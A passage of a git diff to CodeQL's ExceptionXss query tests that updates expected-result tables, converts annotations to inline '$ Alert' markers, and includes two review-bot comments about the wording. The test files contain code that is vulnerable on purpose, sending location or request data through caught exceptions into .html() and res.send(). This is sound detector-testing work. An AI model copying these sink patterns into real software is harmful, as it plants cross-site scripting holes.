.search | Exception text | +| exception-xss.js:155:18:155:18 | e | exception-xss.js:146:12:146:35 | documen ... .search | exception-xss.js:155:18:155:18 | e | $@ is reinterpreted as HTML without escaping meta-characters. | exception-xss.js:146:12:146:35 | documen ... .search | Exception text | +| exception-xss.js:175:18:175:18 | e | exception-xss.js:146:12:146:35 | documen ... .search | exception-xss.js:175:18:175:18 | e | $@ is reinterpreted as HTML without escaping meta-characters. | exception-xss.js:146:12:146:35 | documen ... .search | Exception text | +| exception-xss.js:182:19:182:23 | error | exception-xss.js:180:10:180:22 | req.params.id | exception-xss.js:182:19:182:23 | error | $@ is reinterpreted as HTML without escaping meta-characters. | exception-xss.js:180:10:180:22 | req.params.id | Exception text | +edges +| exception-xss.js:2:6:2:28 | foo | exception-xss.js:9:11:9:13 | foo | provenance | | +| exception-xss.js:2:6:2:28 | foo | exception-xss.js:15:9:15:11 | foo | provenance | | +| exception-xss.js:2:6:2:28 | foo | exception-xss.js:21:11:21:13 | foo | provenance | | +| exception-xss.js:2:6:2:28 | foo | exception-xss.js:33:19:33:21 | foo | provenance | | +| exception-xss.js:2:6:2:28 | foo | exception-xss.js:46:16:46:18 | foo | provenance | | +| exception-xss.js:2:6:2:28 | foo | exception-xss.js:81:16:81:18 | foo | provenance | | +| exception-xss.js:2:6:2:28 | foo | exception-xss.js:89:11:89:13 | foo | provenance | | +| exception-xss.js:2:6:2:28 | foo | exception-xss.js:95:12:95:14 | foo | provenance | | +| exception-xss.js:2:6:2:28 | foo | exception-xss.js:102:12:102:14 | foo | provenance | | +| exception-xss.js:2:12:2:28 | document.location | exception-xss.js:2:6:2:28 | foo | provenance | | +| exception-xss.js:4:17:4:17 | x | exception-xss.js:5:11:5:11 | x | provenance | | +| exception-xss.js:9:11:9:13 | foo | exception-xss.js:10:11:10:11 | e | provenance | Config | +| exception-xss.js:10:11:10:11 | e | exception-xss.js:11:18:11:18 | e | provenance | 
| +| exception-xss.js:15:3:15:12 | exceptional return of inner(foo) | exception-xss.js:16:11:16:11 | e | provenance | | +| exception-xss.js:15:9:15:11 | foo | exception-xss.js:4:17:4:17 | x | provenance | | +| exception-xss.js:15:9:15:11 | foo | exception-xss.js:15:3:15:12 | exceptional return of inner(foo) | provenance | Config | +| exception-xss.js:16:11:16:11 | e | exception-xss.js:17:18:17:18 | e | provenance | | +| exception-xss.js:21:11:21:13 | foo | exception-xss.js:21:11:21:21 | foo + "bar" | provenance | | +| exception-xss.js:21:11:21:21 | foo + "bar" | exception-xss.js:22:11:22:11 | e | provenance | Config | +| exception-xss.js:22:11:22:11 | e | exception-xss.js:23:18:23:18 | e | provenance | | +| exception-xss.js:33:11:33:22 | ["bar", foo] [1] | exception-xss.js:34:11:34:11 | e | provenance | Config | +| exception-xss.js:33:19:33:21 | foo | exception-xss.js:33:11:33:22 | ["bar", foo] [1] | provenance | | +| exception-xss.js:34:11:34:11 | e | exception-xss.js:35:18:35:18 | e | provenance | | +| exception-xss.js:38:16:38:16 | x | exception-xss.js:39:9:39:9 | x | provenance | | +| exception-xss.js:39:9:39:9 | x | exception-xss.js:39:3:39:10 | exceptional return of deep2(x) | provenance | Config | +| exception-xss.js:39:9:39:9 | x | exception-xss.js:41:17:41:17 | x | provenance | | +| exception-xss.js:41:17:41:17 | x | exception-xss.js:42:9:42:9 | x | provenance | | +| exception-xss.js:42:9:42:9 | x | exception-xss.js:4:17:4:17 | x | provenance | | +| exception-xss.js:42:9:42:9 | x | exception-xss.js:42:3:42:10 | exceptional return of inner(x) | provenance | Config | +| exception-xss.js:46:3:46:19 | exceptional return of deep("bar" + foo) | exception-xss.js:47:11:47:11 | e | provenance | | +| exception-xss.js:46:8:46:18 | "bar" + foo | exception-xss.js:38:16:38:16 | x | provenance | | +| exception-xss.js:46:8:46:18 | "bar" + foo | exception-xss.js:46:3:46:19 | exceptional return of deep("bar" + foo) | provenance | Config | +| exception-xss.js:46:16:46:18 | 
foo | exception-xss.js:46:8:46:18 | "bar" + foo | provenance | | +| exception-xss.js:47:11:47:11 | e | exception-xss.js:48:18:48:18 | e | provenance | | +| exception-xss.js:74:28:74:28 | x | exception-xss.js:75:10:75:10 | x | provenance | | +| exception-xss.js:75:10:75:10 | x | exception-xss.js:4:17:4:17 | x | provenance | | +| exception-xss.js:75:10:75:10 | x | exception-xss.js:75:4:75:11 | exceptional return of inner(x) | provenance | Config | +| exception-xss.js:81:3:81:19 | exceptional return of myWeirdInner(foo) | exception-xss.js:82:11:82:11 | e | provenance | | +| exception-xss.js:81:16:81:18 | foo | exception-xss.js:74:28:74:28 | x | provenance | | +| exception-xss.js:81:16:81:18 | foo | exception-xss.js:81:3:81:19 | exceptional return of myWeirdInner(foo) | provenance | Config | +| exception-xss.js:82:11:82:11 | e | exception-xss.js:83:18:83:18 | e | provenance | | +| exception-xss.js:89:11:89:13 | foo | exception-xss.js:89:11:89:26 | foo.match(/foo/) | provenance | | +| exception-xss.js:89:11:89:26 | foo.match(/foo/) | exception-xss.js:90:11:90:11 | e | provenance | Config | +| exception-xss.js:90:11:90:11 | e | exception-xss.js:91:18:91:18 | e | provenance | | +| exception-xss.js:95:11:95:22 | [foo, "bar"] [0] | exception-xss.js:96:11:96:11 | e | provenance | Config | +| exception-xss.js:95:12:95:14 | foo | exception-xss.js:95:11:95:22 | [foo, "bar"] [0] | provenance | | +| exception-xss.js:96:11:96:11 | e | exception-xss.js:97:18:97:18 | e | provenance | | +| exception-xss.js:102:12:102:14 | foo | exception-xss.js:106:11:106:11 | e | provenance | Config | +| exception-xss.js:106:11:106:11 | e | exception-xss.js:107:18:107:18 | e | provenance | | +| exception-xss.js:117:11:117:23 | req.params.id | exception-xss.js:118:11:118:11 | e | provenance | Config | +| exception-xss.js:118:11:118:11 | e | exception-xss.js:119:28:119:28 | e | provenance | | +| exception-xss.js:119:28:119:28 | e | exception-xss.js:119:12:119:28 | "Exception: " + e | provenance | | +| 
exception-xss.js:125:45:125:68 | documen ... .search | exception-xss.js:128:11:128:52 | session ... ssion') | provenance | | +| exception-xss.js:128:11:128:52 | session ... ssion') | exception-xss.js:129:11:129:11 | e | provenance | Config | +| exception-xss.js:129:11:129:11 | e | exception-xss.js:130:18:130:18 | e | provenance | | +| exception-xss.js:136:10:136:22 | req.params.id | exception-xss.js:136:26:136:30 | error | provenance | Config | +| exception-xss.js:136:26:136:30 | error | exception-xss.js:138:19:138:23 | error | provenance | | +| exception-xss.js:146:6:146:35 | foo | exception-xss.js:148:33:148:35 | foo | provenance | | +| exception-xss.js:146:6:146:35 | foo | exception-xss.js:153:8:153:10 | foo | provenance | | +| exception-xss.js:146:6:146:35 | foo | exception-xss.js:174:31:174:33 | foo | provenance | | +| exception-xss.js:146:12:146:35 | documen ... .search | exception-xss.js:146:6:146:35 | foo | provenance | | +| exception-xss.js:148:2:148:46 | new Pro ... solve)) [PromiseError] | exception-xss.js:148:55:148:55 | e | provenance | | +| exception-xss.js:148:33:148:35 | foo | exception-xss.js:148:2:148:46 | new Pro ... solve)) [PromiseError] | provenance | Config | +| exception-xss.js:148:55:148:55 | e | exception-xss.js:149:18:149:18 | e | provenance | | +| exception-xss.js:153:8:153:10 | foo | exception-xss.js:154:11:154:11 | e | provenance | Config | +| exception-xss.js:154:11:154:11 | e | exception-xss.js:155:18:155:18 | e | provenance | | +| exception-xss.js:170:17:170:23 | tainted | exception-xss.js:171:11:171:17 | tainted | provenance | | +| exception-xss.js:174:2:174:44 | new Pro ... solve)) [PromiseError] | exception-xss.js:174:53:174:53 | e | provenance | | +| exception-xss.js:174:25:174:43 | exceptional return of inner(foo, resolve) | exception-xss.js:174:2:174:44 | new Pro ... 
solve)) [PromiseError] | provenance | | +| exception-xss.js:174:31:174:33 | foo | exception-xss.js:170:17:170:23 | tainted | provenance | | +| exception-xss.js:174:31:174:33 | foo | exception-xss.js:174:25:174:43 | exceptional return of inner(foo, resolve) | provenance | Config | +| exception-xss.js:174:53:174:53 | e | exception-xss.js:175:18:175:18 | e | provenance | | +| exception-xss.js:180:10:180:22 | req.params.id | exception-xss.js:180:26:180:30 | error | provenance | Config | +| exception-xss.js:180:26:180:30 | error | exception-xss.js:182:19:182:23 | error | provenance | | nodes | ajv.js:11:18:11:33 | ajv.errorsText() | semmle.label | ajv.errorsText() | | ajv.js:24:18:24:26 | val.error | semmle.label | val.error | 
@@ -79,81 +173,6 @@ nodes | exception-xss.js:180:10:180:22 | req.params.id | semmle.label | req.params.id | | exception-xss.js:180:26:180:30 | error | semmle.label | error | | exception-xss.js:182:19:182:23 | error | semmle.label | error | -edges -| exception-xss.js:2:6:2:28 | foo | exception-xss.js:9:11:9:13 | foo | provenance | | -| exception-xss.js:2:6:2:28 | foo | exception-xss.js:15:9:15:11 | foo | provenance | | -| exception-xss.js:2:6:2:28 | foo | exception-xss.js:21:11:21:13 | foo | provenance | | -| exception-xss.js:2:6:2:28 | foo | exception-xss.js:33:19:33:21 | foo | provenance | | -| exception-xss.js:2:6:2:28 | foo | exception-xss.js:46:16:46:18 | foo | provenance | | -| exception-xss.js:2:6:2:28 | foo | exception-xss.js:81:16:81:18 | foo | provenance | | -| exception-xss.js:2:6:2:28 | foo | exception-xss.js:89:11:89:13 | foo | provenance | | -| exception-xss.js:2:6:2:28 | foo | exception-xss.js:95:12:95:14 | foo | provenance | | -| exception-xss.js:2:6:2:28 | foo | exception-xss.js:102:12:102:14 | foo | provenance | | -| exception-xss.js:2:12:2:28 | document.location | exception-xss.js:2:6:2:28 | foo | provenance | | -| exception-xss.js:4:17:4:17 | x | exception-xss.js:5:11:5:11 | x | provenance | | -| exception-xss.js:9:11:9:13 | foo | exception-xss.js:10:11:10:11 | e | provenance | Config | -| exception-xss.js:10:11:10:11 | e | exception-xss.js:11:18:11:18 | e | provenance | | -| exception-xss.js:15:3:15:12 | exceptional return of inner(foo) | exception-xss.js:16:11:16:11 | e | provenance | | -| exception-xss.js:15:9:15:11 | foo | exception-xss.js:4:17:4:17 | x | provenance | | -| exception-xss.js:15:9:15:11 | foo | exception-xss.js:15:3:15:12 | exceptional return of inner(foo) | provenance | Config | -| exception-xss.js:16:11:16:11 | e | exception-xss.js:17:18:17:18 | e | provenance | | -| exception-xss.js:21:11:21:13 | foo | exception-xss.js:21:11:21:21 | foo + "bar" | provenance | | -| exception-xss.js:21:11:21:21 | foo + "bar" | 
exception-xss.js:22:11:22:11 | e | provenance | Config | -| exception-xss.js:22:11:22:11 | e | exception-xss.js:23:18:23:18 | e | provenance | | -| exception-xss.js:33:11:33:22 | ["bar", foo] [1] | exception-xss.js:34:11:34:11 | e | provenance | Config | -| exception-xss.js:33:19:33:21 | foo | exception-xss.js:33:11:33:22 | ["bar", foo] [1] | provenance | | -| exception-xss.js:34:11:34:11 | e | exception-xss.js:35:18:35:18 | e | provenance | | -| exception-xss.js:38:16:38:16 | x | exception-xss.js:39:9:39:9 | x | provenance | | -| exception-xss.js:39:9:39:9 | x | exception-xss.js:39:3:39:10 | exceptional return of deep2(x) | provenance | Config | -| exception-xss.js:39:9:39:9 | x | exception-xss.js:41:17:41:17 | x | provenance | | -| exception-xss.js:41:17:41:17 | x | exception-xss.js:42:9:42:9 | x | provenance | | -| exception-xss.js:42:9:42:9 | x | exception-xss.js:4:17:4:17 | x | provenance | | -| exception-xss.js:42:9:42:9 | x | exception-xss.js:42:3:42:10 | exceptional return of inner(x) | provenance | Config | -| exception-xss.js:46:3:46:19 | exceptional return of deep("bar" + foo) | exception-xss.js:47:11:47:11 | e | provenance | | -| exception-xss.js:46:8:46:18 | "bar" + foo | exception-xss.js:38:16:38:16 | x | provenance | | -| exception-xss.js:46:8:46:18 | "bar" + foo | exception-xss.js:46:3:46:19 | exceptional return of deep("bar" + foo) | provenance | Config | -| exception-xss.js:46:16:46:18 | foo | exception-xss.js:46:8:46:18 | "bar" + foo | provenance | | -| exception-xss.js:47:11:47:11 | e | exception-xss.js:48:18:48:18 | e | provenance | | -| exception-xss.js:74:28:74:28 | x | exception-xss.js:75:10:75:10 | x | provenance | | -| exception-xss.js:75:10:75:10 | x | exception-xss.js:4:17:4:17 | x | provenance | | -| exception-xss.js:75:10:75:10 | x | exception-xss.js:75:4:75:11 | exceptional return of inner(x) | provenance | Config | -| exception-xss.js:81:3:81:19 | exceptional return of myWeirdInner(foo) | exception-xss.js:82:11:82:11 | e | provenance 
| | -| exception-xss.js:81:16:81:18 | foo | exception-xss.js:74:28:74:28 | x | provenance | | -| exception-xss.js:81:16:81:18 | foo | exception-xss.js:81:3:81:19 | exceptional return of myWeirdInner(foo) | provenance | Config | -| exception-xss.js:82:11:82:11 | e | exception-xss.js:83:18:83:18 | e | provenance | | -| exception-xss.js:89:11:89:13 | foo | exception-xss.js:89:11:89:26 | foo.match(/foo/) | provenance | | -| exception-xss.js:89:11:89:26 | foo.match(/foo/) | exception-xss.js:90:11:90:11 | e | provenance | Config | -| exception-xss.js:90:11:90:11 | e | exception-xss.js:91:18:91:18 | e | provenance | | -| exception-xss.js:95:11:95:22 | [foo, "bar"] [0] | exception-xss.js:96:11:96:11 | e | provenance | Config | -| exception-xss.js:95:12:95:14 | foo | exception-xss.js:95:11:95:22 | [foo, "bar"] [0] | provenance | | -| exception-xss.js:96:11:96:11 | e | exception-xss.js:97:18:97:18 | e | provenance | | -| exception-xss.js:102:12:102:14 | foo | exception-xss.js:106:11:106:11 | e | provenance | Config | -| exception-xss.js:106:11:106:11 | e | exception-xss.js:107:18:107:18 | e | provenance | | -| exception-xss.js:117:11:117:23 | req.params.id | exception-xss.js:118:11:118:11 | e | provenance | Config | -| exception-xss.js:118:11:118:11 | e | exception-xss.js:119:28:119:28 | e | provenance | | -| exception-xss.js:119:28:119:28 | e | exception-xss.js:119:12:119:28 | "Exception: " + e | provenance | | -| exception-xss.js:125:45:125:68 | documen ... .search | exception-xss.js:128:11:128:52 | session ... ssion') | provenance | | -| exception-xss.js:128:11:128:52 | session ... 
ssion') | exception-xss.js:129:11:129:11 | e | provenance | Config | -| exception-xss.js:129:11:129:11 | e | exception-xss.js:130:18:130:18 | e | provenance | | -| exception-xss.js:136:10:136:22 | req.params.id | exception-xss.js:136:26:136:30 | error | provenance | Config | -| exception-xss.js:136:26:136:30 | error | exception-xss.js:138:19:138:23 | error | provenance | | -| exception-xss.js:146:6:146:35 | foo | exception-xss.js:148:33:148:35 | foo | provenance | | -| exception-xss.js:146:6:146:35 | foo | exception-xss.js:153:8:153:10 | foo | provenance | | -| exception-xss.js:146:6:146:35 | foo | exception-xss.js:174:31:174:33 | foo | provenance | | -| exception-xss.js:146:12:146:35 | documen ... .search | exception-xss.js:146:6:146:35 | foo | provenance | | -| exception-xss.js:148:2:148:46 | new Pro ... solve)) [PromiseError] | exception-xss.js:148:55:148:55 | e | provenance | | -| exception-xss.js:148:33:148:35 | foo | exception-xss.js:148:2:148:46 | new Pro ... solve)) [PromiseError] | provenance | Config | -| exception-xss.js:148:55:148:55 | e | exception-xss.js:149:18:149:18 | e | provenance | | -| exception-xss.js:153:8:153:10 | foo | exception-xss.js:154:11:154:11 | e | provenance | Config | -| exception-xss.js:154:11:154:11 | e | exception-xss.js:155:18:155:18 | e | provenance | | -| exception-xss.js:170:17:170:23 | tainted | exception-xss.js:171:11:171:17 | tainted | provenance | | -| exception-xss.js:174:2:174:44 | new Pro ... solve)) [PromiseError] | exception-xss.js:174:53:174:53 | e | provenance | | -| exception-xss.js:174:25:174:43 | exceptional return of inner(foo, resolve) | exception-xss.js:174:2:174:44 | new Pro ... 
solve)) [PromiseError] | provenance | | -| exception-xss.js:174:31:174:33 | foo | exception-xss.js:170:17:170:23 | tainted | provenance | | -| exception-xss.js:174:31:174:33 | foo | exception-xss.js:174:25:174:43 | exceptional return of inner(foo, resolve) | provenance | Config | -| exception-xss.js:174:53:174:53 | e | exception-xss.js:175:18:175:18 | e | provenance | | -| exception-xss.js:180:10:180:22 | req.params.id | exception-xss.js:180:26:180:30 | error | provenance | Config | -| exception-xss.js:180:26:180:30 | error | exception-xss.js:182:19:182:23 | error | provenance | | subpaths | exception-xss.js:15:9:15:11 | foo | exception-xss.js:4:17:4:17 | x | exception-xss.js:5:11:5:11 | x | exception-xss.js:15:3:15:12 | exceptional return of inner(foo) | | exception-xss.js:39:9:39:9 | x | exception-xss.js:41:17:41:17 | x | exception-xss.js:42:3:42:10 | exceptional return of inner(x) | exception-xss.js:39:3:39:10 | exceptional return of deep2(x) | 
@@ -162,22 +181,3 @@ subpaths | exception-xss.js:75:10:75:10 | x | exception-xss.js:4:17:4:17 | x | exception-xss.js:5:11:5:11 | x | exception-xss.js:75:4:75:11 | exceptional return of inner(x) | | exception-xss.js:81:16:81:18 | foo | exception-xss.js:74:28:74:28 | x | exception-xss.js:75:4:75:11 | exceptional return of inner(x) | exception-xss.js:81:3:81:19 | exceptional return of myWeirdInner(foo) | | exception-xss.js:174:31:174:33 | foo | exception-xss.js:170:17:170:23 | tainted | exception-xss.js:171:11:171:17 | tainted | exception-xss.js:174:25:174:43 | exceptional return of inner(foo, resolve) | -#select -| ajv.js:11:18:11:33 | ajv.errorsText() | ajv.js:11:18:11:33 | ajv.errorsText() | ajv.js:11:18:11:33 | ajv.errorsText() | $@ is reinterpreted as HTML without escaping meta-characters. | ajv.js:11:18:11:33 | ajv.errorsText() | JSON schema validation error | -| ajv.js:24:18:24:26 | val.error | ajv.js:24:18:24:26 | val.error | ajv.js:24:18:24:26 | val.error | $@ is reinterpreted as HTML without escaping meta-characters. | ajv.js:24:18:24:26 | val.error | JSON schema validation error | -| exception-xss.js:11:18:11:18 | e | exception-xss.js:2:12:2:28 | document.location | exception-xss.js:11:18:11:18 | e | $@ is reinterpreted as HTML without escaping meta-characters. | exception-xss.js:2:12:2:28 | document.location | Exception text | -| exception-xss.js:17:18:17:18 | e | exception-xss.js:2:12:2:28 | document.location | exception-xss.js:17:18:17:18 | e | $@ is reinterpreted as HTML without escaping meta-characters. | exception-xss.js:2:12:2:28 | document.location | Exception text | -| exception-xss.js:23:18:23:18 | e | exception-xss.js:2:12:2:28 | document.location | exception-xss.js:23:18:23:18 | e | $@ is reinterpreted as HTML without escaping meta-characters. 
| exception-xss.js:2:12:2:28 | document.location | Exception text | -| exception-xss.js:35:18:35:18 | e | exception-xss.js:2:12:2:28 | document.location | exception-xss.js:35:18:35:18 | e | $@ is reinterpreted as HTML without escaping meta-characters. | exception-xss.js:2:12:2:28 | document.location | Exception text | -| exception-xss.js:48:18:48:18 | e | exception-xss.js:2:12:2:28 | document.location | exception-xss.js:48:18:48:18 | e | $@ is reinterpreted as HTML without escaping meta-characters. | exception-xss.js:2:12:2:28 | document.location | Exception text | -| exception-xss.js:83:18:83:18 | e | exception-xss.js:2:12:2:28 | document.location | exception-xss.js:83:18:83:18 | e | $@ is reinterpreted as HTML without escaping meta-characters. | exception-xss.js:2:12:2:28 | document.location | Exception text | -| exception-xss.js:91:18:91:18 | e | exception-xss.js:2:12:2:28 | document.location | exception-xss.js:91:18:91:18 | e | $@ is reinterpreted as HTML without escaping meta-characters. | exception-xss.js:2:12:2:28 | document.location | Exception text | -| exception-xss.js:97:18:97:18 | e | exception-xss.js:2:12:2:28 | document.location | exception-xss.js:97:18:97:18 | e | $@ is reinterpreted as HTML without escaping meta-characters. | exception-xss.js:2:12:2:28 | document.location | Exception text | -| exception-xss.js:107:18:107:18 | e | exception-xss.js:2:12:2:28 | document.location | exception-xss.js:107:18:107:18 | e | $@ is reinterpreted as HTML without escaping meta-characters. | exception-xss.js:2:12:2:28 | document.location | Exception text | -| exception-xss.js:119:12:119:28 | "Exception: " + e | exception-xss.js:117:11:117:23 | req.params.id | exception-xss.js:119:12:119:28 | "Exception: " + e | $@ is reinterpreted as HTML without escaping meta-characters. | exception-xss.js:117:11:117:23 | req.params.id | Exception text | -| exception-xss.js:130:18:130:18 | e | exception-xss.js:125:45:125:68 | documen ... 
.search | exception-xss.js:130:18:130:18 | e | $@ is reinterpreted as HTML without escaping meta-characters. | exception-xss.js:125:45:125:68 | documen ... .search | Exception text | -| exception-xss.js:138:19:138:23 | error | exception-xss.js:136:10:136:22 | req.params.id | exception-xss.js:138:19:138:23 | error | $@ is reinterpreted as HTML without escaping meta-characters. | exception-xss.js:136:10:136:22 | req.params.id | Exception text | -| exception-xss.js:149:18:149:18 | e | exception-xss.js:146:12:146:35 | documen ... .search | exception-xss.js:149:18:149:18 | e | $@ is reinterpreted as HTML without escaping meta-characters. | exception-xss.js:146:12:146:35 | documen ... .search | Exception text | -| exception-xss.js:155:18:155:18 | e | exception-xss.js:146:12:146:35 | documen ... .search | exception-xss.js:155:18:155:18 | e | $@ is reinterpreted as HTML without escaping meta-characters. | exception-xss.js:146:12:146:35 | documen ... .search | Exception text | -| exception-xss.js:175:18:175:18 | e | exception-xss.js:146:12:146:35 | documen ... .search | exception-xss.js:175:18:175:18 | e | $@ is reinterpreted as HTML without escaping meta-characters. | exception-xss.js:146:12:146:35 | documen ... .search | Exception text | -| exception-xss.js:182:19:182:23 | error | exception-xss.js:180:10:180:22 | req.params.id | exception-xss.js:182:19:182:23 | error | $@ is reinterpreted as HTML without escaping meta-characters. | exception-xss.js:180:10:180:22 | req.params.id | Exception text | diff --git a/javascript/ql/test/query-tests/Security/CWE-079/ExceptionXss/ExceptionXss.qlref b/javascript/ql/test/query-tests/Security/CWE-079/ExceptionXss/ExceptionXss.qlref index 5fae24d64c44..fc217c51197f 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/ExceptionXss/ExceptionXss.qlref +++ b/javascript/ql/test/query-tests/Security/CWE-079/ExceptionXss/ExceptionXss.qlref 
@@ -1 +1,2 @@ -Security/CWE-079/ExceptionXss.ql \ No newline at end of file +query: Security/CWE-079/ExceptionXss.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Security/CWE-079/ExceptionXss/ajv.js b/javascript/ql/test/query-tests/Security/CWE-079/ExceptionXss/ajv.js index 36dd5181a1b5..43c6618430e2 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/ExceptionXss/ajv.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/ExceptionXss/ajv.js @@ -8,7 +8,7 @@ ajv.addSchema({type: 'object', additionalProperties: {type: 'number'}}, 'pollDat app.post('/polldata', (req, res) => { if (!ajv.validate('pollData', req.body)) { - res.send(ajv.errorsText()); // NOT OK + res.send(ajv.errorsText()); // $ Alert } }); @@ -21,6 +21,6 @@ const joiSchema = joi.object().keys({ app.post('/votedata', (req, res) => { const val = joiSchema.validate(req.body); if (val.error) { - res.send(val.error); // NOT OK + res.send(val.error); // $ Alert } }); \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-079/ExceptionXss/exception-xss.js b/javascript/ql/test/query-tests/Security/CWE-079/ExceptionXss/exception-xss.js index 150b9e204fda..68212b5c0dd4 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/ExceptionXss/exception-xss.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/ExceptionXss/exception-xss.js @@ -1,5 +1,5 @@ (function () { - var foo = document.location; + var foo = document.location; // $ Source function inner(x) { unknown(x); 
@@ -8,31 +8,31 @@ try { unknown(foo); } catch (e) { - $('myId').html(e); // NOT OK! + $('myId').html(e); // $ Alert } try { inner(foo); } catch (e) { - $('myId').html(e); // NOT OK! + $('myId').html(e); // $ Alert } try { unknown(foo + "bar"); } catch (e) { - $('myId').html(e); // NOT OK! + $('myId').html(e); // $ Alert } try { unknown({ prop: foo }); } catch (e) { - $('myId').html(e); // NOT OK! - but not detected due to not tainting object that have a tainted propety. [INCONSISTENCY] + $('myId').html(e); // $ MISSING: Alert - but not detected due to not tainting object that have a tainted propety. } try { unknown(["bar", foo]); } catch (e) { - $('myId').html(e); // NOT OK! + $('myId').html(e); // $ Alert } function deep(x) { @@ -45,13 +45,13 @@ try { deep("bar" + foo); } catch (e) { - $('myId').html(e); // NOT OK! + $('myId').html(e); // $ Alert } try { var tmp = "bar" + foo; } catch (e) { - $('myId').html(e); // OK + $('myId').html(e); } function safe(x) { @@ -61,13 +61,13 @@ try { safe(foo); } catch (e) { - $('myId').html(e); // OK + $('myId').html(e); } try { safe.call(null, foo); } catch (e) { - $('myId').html(e); // OK + $('myId').html(e); } var myWeirdInner; try { @@ -75,12 +75,12 @@ inner(x); } } catch (e) { - $('myId').html(e); // OK + $('myId').html(e); } try { myWeirdInner(foo); } catch (e) { - $('myId').html(e); // NOT OK! + $('myId').html(e); // $ Alert } $('myId').html(foo); // Direct leak, reported by other query. @@ -88,13 +88,13 @@ try { unknown(foo.match(/foo/)); } catch (e) { - $('myId').html(e); // NOT OK! + $('myId').html(e); // $ Alert } try { unknown([foo, "bar"]); } catch (e) { - $('myId').html(e); // NOT OK! + $('myId').html(e); // $ Alert } try { @@ -104,7 +104,7 @@ // nothing } } catch (e) { - $('myId').html(e); // NOT OK! + $('myId').html(e); // $ Alert } }); 
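Review bot: The `MISSING: Alert` annotation on the `unknown({ prop: foo })` case carries over the old comment's wording, including the typo `propety` and the ungrammatical `object that have`. This is the one line in the hunk that records a known false negative of the query rather than an expected result, so it should be the clearest. I would reword it as `$('myId').html(e); // $ MISSING: Alert - an object literal with a tainted property is not treated as tainted`. The enclosing function starts before this hunk and ends after it.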
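Review bot: The no-alert case in the `@@ -45,13 +45,13 @@` hunk (`var tmp = "bar" + foo;`) loses its `// OK` marker and becomes a bare `$('myId').html(e);`. The same happens in the `-61,13`, `-75,12`, `-114,57` and `-210,7` hunks. The inline-expectations postprocess presumably still fails the test if an alert shows up on an unannotated line, but a reader can no longer tell a deliberate negative case from a forgotten annotation, while other lines in the file keep `// OK - <reason>`. I would keep a short reason on each sink, for the `tmp` case something like `$('myId').html(e); // OK - nothing in the try block throws the tainted value`.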
@@ -114,57 +114,57 @@ var app = express(); app.get('/user/:id', function (req, res) { try { - unknown(req.params.id); + unknown(req.params.id); // $ Source } catch (e) { - res.send("Exception: " + e); // NOT OK! + res.send("Exception: " + e); // $ Alert } }); (function () { - sessionStorage.setItem('exceptionSession', document.location.search); + sessionStorage.setItem('exceptionSession', document.location.search); // $ Source try { unknown(sessionStorage.getItem('exceptionSession')); } catch (e) { - $('myId').html(e); // NOT OK + $('myId').html(e); // $ Alert } })(); app.get('/user/:id', function (req, res) { - unknown(req.params.id, (error, res) => { + unknown(req.params.id, (error, res) => { // $ Source if (error) { - $('myId').html(error); // NOT OK + $('myId').html(error); // $ Alert return; } - $('myId').html(res); // OK (for now?) + $('myId').html(res); // OK - for now? }); }); (function () { - var foo = document.location.search; + var foo = document.location.search; // $ Source new Promise(resolve => unknown(foo, resolve)).catch((e) => { - $('myId').html(e); // NOT OK + $('myId').html(e); // $ Alert }); try { null[foo]; } catch (e) { - $('myId').html(e); // NOT OK + $('myId').html(e); // $ Alert } try { unknown()[foo]; } catch (e) { - $('myId').html(e); // OK. We are not sure that `unknown()` is null-ish. + $('myId').html(e); // OK - We are not sure that `unknown()` is null-ish. } try { "foo"[foo] } catch (e) { - $('myId').html(e); // OK + $('myId').html(e); } function inner(tainted, resolve) { 
@@ -172,16 +172,16 @@ app.get('/user/:id', function (req, res) { } new Promise(resolve => inner(foo, resolve)).catch((e) => { - $('myId').html(e); // NOT OK + $('myId').html(e); // $ Alert }); })(); app.get('/user/:id', function (req, res) { - unknown(req.params.id, (error, res) => { + unknown(req.params.id, (error, res) => { // $ Source if (error) { - $('myId').html(error); // NOT OK + $('myId').html(error); // $ Alert } - $('myId').html(res); // OK - does not contain an error, and `res` is otherwise unknown. + $('myId').html(res); // OK - does not contain an error, and `res` is otherwise unknown. }); }); @@ -189,7 +189,7 @@ app.get('/user/:id', function (req, res) { try { res.send(req.params.id); } catch(err) { - res.send(err); // OK (the above `res.send()` is already reported by js/xss) + res.send(err); // OK - (the above `res.send()` is already reported by js/xss) } }); @@ -210,7 +210,7 @@ var fs = require("fs"); log.info(foo); localStorage.setItem(foo); } catch (e) { - $('myId').html(e); // OK + $('myId').html(e); } })(); \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ConsistencyReflectedXss.expected b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ConsistencyReflectedXss.expected deleted file mode 100644 index e69de29bb2d1..000000000000 diff --git a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ConsistencyReflectedXss.ql b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ConsistencyReflectedXss.ql deleted file mode 100644 index 9019d53e10ed..000000000000 --- a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ConsistencyReflectedXss.ql +++ /dev/null @@ -1,3 +0,0 @@ -import javascript -deprecated import utils.test.ConsistencyChecking -import semmle.javascript.security.dataflow.ReflectedXssQuery as ReflectedXss 
diff --git a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ReflectedXss.expected b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ReflectedXss.expected
index 675403f5ab9d..d85a90e4026a 100644
--- a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ReflectedXss.expected
+++ b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ReflectedXss.expected
